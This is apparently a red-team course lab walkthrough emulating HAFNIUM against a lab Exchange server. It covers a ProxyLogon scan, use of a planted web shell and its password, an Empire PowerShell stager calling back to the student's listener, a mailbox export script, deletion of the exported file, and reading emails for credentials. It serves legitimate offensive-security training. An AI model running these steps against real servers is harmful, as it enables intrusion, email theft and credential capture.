Lab 3.2 : Initial Access
Objectives
- Scan the Microsoft Exchange server
- Use a web shell to interact with the mail server
- Execute an Empire stager on the mail server
- Export user emails
- Read user emails for target intelligence
In this lab we will be attacking the enterprise Microsoft Exchange server. They are running an out-of-date mail server that is vulnerable to ProxyLogon. The server has already been implanted with a web shell, our goal is to conduct a quick survey and get an agent onto the server as our initial access.
TTPs Emulated in this Lab
- T1005 - Data from Local System
- T1505.003 - Server Software Component: Web Shell
- T1114.002 - Email Collection: Remote Email Collection
Preparation
Preparation Steps
Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.
Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:
sudo openvpn ~/Desktop/sec565-labs-range.ovpn
Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :
ping -c 4 draconem.io
If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.
curl draconem.io | head

On Your Own
- Create an Empire listener
- Create a PowerShell stager
- Access the web shell, https://mail.draconem.io/owa/auth/rt-webshell-xcowe83.aspx with password
#$pwn3daspx#$h3ll, and execute the stager - Enumerate user mailboxes
- Export and download the mailbox for user:
mark.goodwin - Locate the target intelligence in the pst file by using
readpst - Review the walkthrough
Walkthrough
Scan Microsoft Exchange
1. Let's first begin by scanning the Draconem mail server at mail.draconem.io with nmap using an nmap scripting engine (NSE) script designed to look for the ProxyLogon vulnerability.
cd /labs/sec-3/initial-access/
curl https://raw.githubusercontent.com/GossiTheDog/scanning/main/http-vuln-exchange.nse -o http-vuln-exchange.nse
nmap --script http-vuln-exchange.nse mail.draconem.io

ProxyLogon is the name for CVE-2021-26855 and CVE-2021-27065. CVE-2021-26855 is a vulnerability on Microsoft Exchange that allows authentication bypass. CVE-2021-27065 is a post authentication file write vulnerability. When chained together, they allow remote code execution by allowing an adversary to bypass authentication and write a web shell to the server.
2. Based on the output from nmap, we can see that the server may be vulnerable. In some engagements it is wiser to work with the White Cell to simulate exploitation to avoid taking down production servers. In this case, your team has identified the vulnerability and the White Cell has asked a Trusted Agent to implant the Exchange server with a web shell that is keyed with the password: #$pwn3daspx#$h3ll.
Tip
Red Team Tip: Only use web shells with authentication, otherwise others could leverage your web shell.
Launch Empire and Starkiller
3. Launch Empire and start an http listener on port 8080 for your tun0 interface. If you run into any issues refer back to Lab 2.1 - C2 Introduction with Empire
Create PowerShell Stager
4. Create an Empire stager. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select multi/launcher in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-http-pwsh - Listener:
interactive-http - Language:
powershell
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

On Slingshot, navigate to the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Copy to Clipboard.

Interact with the Web Shell
5. Open up a browser to https://mail.draconem.io/owa/auth/rt-webshell-xcowe83.aspx, accept the certificate warning (if needed), then enter the password, #$pwn3daspx#$h3ll, to authenticate with the web shell.

This web shell comes with a lot of functionality, feel free to explore the webshell if you have time at the end of the lab.
Deploy Agent on mail.draconem.io
6. We want to get an agent on this system in order to bring more tools and capability. Click Cmd command in the top navigation window. Paste your PowerShell stager into Statements to spawn a new agent. Click carried out and check starkiller for a new agent.
Warning
The Statements field should start with /c powershell -noP -sta -w 1 -enc ...


Enumerate Users
7. You should notice that you are running in the context of SYSTEM. Our next step is to use our advantaged position to pick up target intelligence from user emails. First we need to enumerate the users with mailboxes by using the Microsoft.Exchange.Management.Powershell.SnapIn that will allow us use additional PowerShell functions and cmdlets that interact with Microsoft Exchange. Interact with your agent and enter the following in the Shell Command field and click RUN. To expand the console output (green font on black background), click the < icon on the right of the screen below the red trash trashcan icon.
powershell -c "Add-PSSnapIn Microsoft.Exchange.Management.Powershell.SnapIn; Get-Recipient | Format-Table -Auto Alias"

Export User Emails
8. Below is a bit of PowerShell that we will make into a script. It adds the Exchange SnapIn, sets an output file and then exports the user's email to a pst file. Create the file on Slingshot Linux at /labs/sec-3/initial-access/export-email.ps1. There are many ways to complete a task but these commands mimic the same techniques used by HAFNIUM, the adversary we are emulating. These commands need to run as a script because there are some inconsistencies with stating UNC paths. Copy the PowerShell below to your new ps1 file on Slingshot Linux.
function Export-Email {
param (
$User
)
Add-PSSnapIn Microsoft.Exchange.Management.Powershell.SnapIn;
$OutFile = "\\127.0.0.1\c$\ProgramData\" + $User + ".pst";
New-MailboxExportRequest -Mailbox $User -FilePath $OutFile;
};
9. We will invoke this script with an Empire module called invoke_script. Interact with your agent, select powershell/management/invoke_script from the Execute Module drop down list. Then enter the following values:
- ScriptCmd:
Export-Email Mark.Goodwin - ScriptPath:
/labs/sec-3/initial-access/export-email.ps1
Then click the SUBMIT button.

The output from the script should be similar to this:
FilePath : \\127.0.0.1\c$\ProgramData\Mark.Goodwin.pst
Mailbox : draconem.corp/Sales/Mark Goodwin
Name : MailboxExport7
RequestGuid : 05e78e04-d606-4d5c-8858-bb44d4466f03
RequestQueue : Mailbox Database 0242420800
Flags : IntraOrg, Push
BatchName :
Status : Queued
Protect : False
Suspend : False
Direction : Push
RequestStyle : IntraOrg
OrganizationId :
WhenChanged : <DATETIME>
WhenCreated : <DATETIME>
WhenChangedUTC : <DATETIME>
WhenCreatedUTC : <DATETIME>
Identity : draconem.corp/Sales/Mark Goodwin\MailboxExport7
IsValid : True
ObjectState : New
Read User Emails
10. Download the exported mailbox by clicking the down arrow icon
in the upper right of the agent screen. The file should be located at c:\ProgramData\Mark.Goodwin.pst. After downloading the file delete it off the mail server by issuing this shell command del c:\ProgramData\Mark.Goodwin.pst.
Warning
There is no message or indicator that the file has downloaded to your local file system. To find the downloaded files, follow the next steps.

11. Examine the pst using readpst. First we use find to list pst files in our Agent download directory. Then we cp the file to our current working directory.
cd /labs/sec-3/initial-access/
find /opt/Empire/empire/server/downloads/ | grep pst
cp /opt/Empire/empire/server/downloads/*/C:/ProgramData/Mark.Goodwin.pst .
readpst -S -o . Mark.Goodwin.pst
Warning
Agent names are randomly generated, insert the name of your agent in place of the asterisk * when you copy the pst to the lab directory

readpst has extracted all the emails from the pst file to plain text. We can now read through them for target intelligence.
ll Mark.Goodwin/Inbox/
strings Mark.Goodwin/Inbox/1

We just found that Mark Goodwin's password has been reset to C@v3t3Dr@c0n3m!!
Conclusion
In this lab we used a web shell that was placed on the Microsoft Exchange server to deploy an agent. Once we had positive control of our agent in target space we established our initial access. We were fortunate that our agent is running as SYSTEM and has unfettered access to the system. We then enumerated users and exported a mailbox to read through emails. In those emails we found that the user Mark.Goodwin had their password reset to C@v3t3Dr@c0n3m!!. We will use this information for later labs. Leave your agent running for the next lab.
Bonus
Continue to read through the mailboxes of other users to find additional target intelligence.